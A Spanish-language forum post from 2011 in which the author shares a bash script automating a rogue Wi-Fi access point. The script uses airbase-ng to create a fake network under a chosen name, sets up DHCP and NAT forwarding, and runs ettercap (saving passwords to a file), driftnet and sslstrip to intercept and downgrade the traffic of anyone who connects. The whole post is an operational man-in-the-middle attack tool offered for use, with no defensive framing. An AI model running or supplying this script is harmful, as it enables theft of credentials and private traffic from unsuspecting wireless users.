Hola Visitante

Autor Tema: fake-sh (airssl automatizado)  (Leído 2812 veces)

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
fake-sh (airssl automatizado)
« en: Agosto 20, 2011, 11:12:45 pm »
bueno pues ultimamnete me he dedicado a jugar con airssl y dado que me da mucho por culo tanta pregunta y que no habia conseguido conectar bien, con la red falsa creada, he creado este script  a mi gusto, espero que os guste


dependencias, esta pensado para usarse en debian para las otras distros habra que editar alguna cosilla, pero la idea esta clara.

apt-get install iw wireless-tools ettercap driftnet isc-dhcp-server
ademas encesitaremos instalar  python para poder ejecutar e instalar sslstrip
apt-get install python python-twisted-web

http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz


Código: (bash) [Seleccionar]
#!/bin/bash
################
################
### berni69 ####    Esto es un pequeño script hecho por mi, basado en el airssl que contiene algunas medidas de control,
################     y automatiza el proceso de lanzamiento delas aplicaciones
## 20/8/2011 ###
################
################



#################################################
if [ $# != 3 ]; then {
echo 'Uso '\"$0\"' eth0 wlan0 \"MIWIFI\"'
exit 0
}

fi

if [ $UID != 0 ]; then
{
echo \" Debes ser root para ejecutar este script\"
exit 0
}
fi
#################################################

AP_RED='192.168.3.0/24'
LOOP='127.0.0.1/8'
INET_IFACE=$1
WLAN_IFACE=$2
ESSID=\"$3\"
RUTA=\"/tmp\"

###################################################
## COMPROBACION DE LA EXISTENCIA DE LAS TARJETAS ##
###################################################

TMP=`ifconfig | grep -o $INET_IFACE`
if [ -z $TMP ]; then
{
echo \"No se puede ejecutar el script: $INET_IFACE no existe\"
exit 0
}
fi

TMP=`ifconfig | grep -o $WLAN_IFACE`
if [ -z $TMP ]; then
{
echo \"No se puede ejecutar el script: $WLAN_IFACE no existe\"
exit 0
}
fi
####################################################





# PONEMOS LA TARJETA EN MODO MONITOR
# Y SELECCIONAMOS LA INTERFACE

airmon-ng start $WLAN_IFACE
MON_IFACE=`airmon-ng | grep  mon[0-9] | cut -f 1 | tail -n1`

if [ -z $MON_IFACE ];
 then
{
echo \"No se pudo poner en modo monitor la tarjeta!\"
exit 0
}
fi




##############################################
#####INTRODUCIMOS LA CONFIGURACION DHCPD #####
##############################################

RUTA='/tmp'
#mkdir -p /etc/dhcp  > /dev/null
cat > $RUTA/dhcpd.conf << \"EOF\"

ddns-update-style none;
ignore client-updates; # ignoramos peticiones de actualizacion DDNS de los clientes
authoritative; # servidor maestro de dhcp
default-lease-time 86400; # 24 horas (tiempo de \"vida\" de la IP asignada al cliente)
max-lease-time 172800; # 48 horas (tiempo de \"vida\" maximo de la IP asignada al cliente)

subnet 192.168.3.0 netmask 255.255.255.0
{
option routers 192.168.3.1; # router de la red
option broadcast-address 192.168.3.255; # direccion broadcast
option domain-name-servers 62.42.63.52,62.42.230.24; # DNS para los clientes
range 192.168.3.33 192.168.3.254; # rango de IPs permitidas
allow unknown-clients; # no filtramos clientes asi que no seria necesario, pero asi no se olvida
}


EOF

#
#Lanzamos airbase-ng
#

xterm -geometry 75x20+1+100 -T FAKEAP -e  airbase-ng   --essid \"$ESSID\" $MON_IFACE -v -c6  & fakeapid=$!


sleep 3


##
##Confiugramos el nuevo adaptador
##


AP_IFACE=`iwconfig 2>&1 | grep  at[0-9] -o | tail -n1`

ifconfig $AP_IFACE 192.168.3.1 netmask 255.255.255.0 up

DHCP_ON=`ps -A | grep dhcpd`
if [ -n \"$DHCP_ON\" ]; then {
killall dhcpd > /dev/null
}
fi
#xterm -T \"SERVIDOR DHCP\" -e dhcpd -d -f $AP_IFACE -cf $RUTA/dhcpd.conf  & dhcpid=$! ##################PARA DEBIAN
xterm -T \"SERVIDOR DHCP\" -e dhcpd3 -f -d $AP_IFACE -cf $RUTA/dhcpd.conf  & dhcpid=$! ################### EN UBUNTU DA XCULO X PERMISOS -- soucionar?
sleep 2

clear


echo \"Configurando Iptables\"

 ##########################################################################################################

##########################################################################################################
echo \"Limpiamos las reglas previas\"
iptables -F
iptables -X
iptables -Z
iptables -t nat -F

echo \"Politica para denegar todo por defecto\"
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

echo  \"Permitimos todo en local\"
iptables -A INPUT -i lo -d $LOOP -j ACCEPT
iptables -A OUTPUT -o lo -s $LOOP -j ACCEPT

echo \"Permitimos todo en at0\"
iptables -A INPUT -i $AP_IFACE -j ACCEPT
iptables -A OUTPUT -o $AP_IFACE -j ACCEPT

echo  \"Permitimos forwarding en la subred del AP\"
iptables -A FORWARD -s $AP_RED -i $AP_IFACE -o $INET_IFACE -j ACCEPT
iptables -A FORWARD -d $AP_RED -o $AP_IFACE -i $INET_IFACE -j ACCEPT

echo \"Enmascaramos la subred del AP con la interface conectada a internet\"
iptables -t nat -A POSTROUTING -s $AP_RED -o $INET_IFACE -j MASQUERADE

echo \"Como por defecto hacemos DROP, permitimos todo en $INET_IFACE\"
iptables -A INPUT -i $INET_IFACE -j ACCEPT
iptables -A OUTPUT -o $INET_IFACE -j ACCEPT



#sysctl -w net.ipv4.ip_forward=1
echo 1 > /proc/sys/net/ipv4/ip_forward

###########################################################################################################

###########ETTERCAP-NG######################

xterm -T \"ETTERCAP-NG\" -e ettercap -p -u -T -q -w $RUTA/PASSWORD -i $AP_IFACE & ettercapid=$!
sleep 2


###### DRIFTNET #####
xterm -T \"Driftnet\" -e driftnet -i $INET_IFACE -p -d $RUTA & dritnetid=$!
sleep 2
###### SSL-STRIP  #######

xterm -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!

sleep 2

###### SSLSTRIP LOG #####

xterm -T SSLSTRIP-LOG -e tail -f sslstrip.log & sslstriplogid=$!

sleep 2
echo \"\"
echo \"\"


echo \"Pulse una Intro para salir\"

read SALIR

kill ${fakeapid}
kill ${dhcpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $MON_IFACE
airmon-ng stop $WLAN_IFACE




exit 0

de momento no le funciona, el stripssl. como debiera.